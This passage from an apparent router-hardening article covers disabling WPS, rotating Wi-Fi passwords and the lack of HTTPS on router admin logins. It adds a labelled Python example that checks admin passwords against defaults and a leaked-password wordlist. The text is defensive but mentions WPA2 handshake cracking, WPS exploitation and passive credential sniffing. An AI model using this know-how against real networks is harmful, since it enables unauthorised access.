  • Disable WPS. WPS is a feature built into most routers that is supposed to make secure, password-less access to your router easier. Unfortunately, the feature is usually enabled by default and can be easily exploited by hackers.
  • Be persistent. Change your Wi-Fi password every few months. It's a pain to reset the Wi-Fi password on all your devices, but this tactic will keep hackers guessing — literally. If a hacker has captured a WPA2 handshake and spends several weeks trying to crack it, changing your password will render the captured handshake useless.

Unfortunately, none of the routers I tested support HTTPS when authenticating the admin. So an attacker on the network inspecting traffic will be able to passively discover the login password — even if it's a totally random 42-character password.
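The "change default passwords" advice follows directly from the wordlist lesson earlier in the article: a few thousand leaked passwords found "yellow" in 22 seconds, so the admin password has to be something no such list contains. The following is an added Python example, not code from the original article, of the kind of policy check a gateway (or the person choosing its password) can apply before accepting a new admin password: it rejects vendor defaults, rejects anything whose base word appears in a leaked-password list even after the usual decorations (capitalisation, trailing digits and symbols, leet substitutions) are stripped, and enforces a minimum length. The wordlist and vendor-default sets are constructed stand-ins; the article's list has a few thousand entries.

```python
# Added example, not from the original article: an admin-password policy check
# built on the article's lesson that a small leaked-password wordlist beats a
# huge generic one. LEAKED_WORDLIST and VENDOR_DEFAULTS are constructed stand-ins.
import re

LEAKED_WORDLIST = {"123456", "password", "yellow", "qwerty", "12345678",
                   "abc123", "letmein", "iloveyou"}
VENDOR_DEFAULTS = {"admin", "password", "1234"}

# Common leet substitutions that wordlist mangling rules undo as a matter of course.
_LEET = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a", "5": "s",
                       "@": "a", "$": "s"})


def base_word(candidate):
    """Strip the cheap decorations a password-cracking rule set also strips:
    case, leading/trailing digits and symbols, and leet substitutions."""
    word = candidate.lower()
    word = re.sub(r"[\d!@#$%^&*._-]+$", "", word)   # trailing digits/symbols
    word = re.sub(r"^[\d!@#$%^&*._-]+", "", word)   # leading digits/symbols
    return word.translate(_LEET)


def check_admin_password(candidate, min_length=12):
    """Return a list of problems with the candidate; an empty list means it passed."""
    problems = []
    if len(candidate) < min_length:
        problems.append(f"shorter than {min_length} characters")
    if candidate.lower() in VENDOR_DEFAULTS:
        problems.append("is a vendor default password")
    if candidate.lower() in LEAKED_WORDLIST or base_word(candidate) in LEAKED_WORDLIST:
        problems.append("base word appears in a leaked-password wordlist")
    return problems


if __name__ == "__main__":
    for pw in ("password", "Yellow2020", "P@ssw0rd1!", "corridor-blue-lantern-72"):
        verdict = check_admin_password(pw)
        print(f"{pw!r}: {'OK' if not verdict else '; '.join(verdict)}")
```

In practice the blocklist would be loaded from a file such as the one the article downloads; the normalisation step matters because "Yellow2020" is not in that file verbatim, yet any brute-force run that applies a basic rule set reaches it almost as quickly as "yellow" itself.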


Cover photo and screenshots by tokyoneon/Null Byte
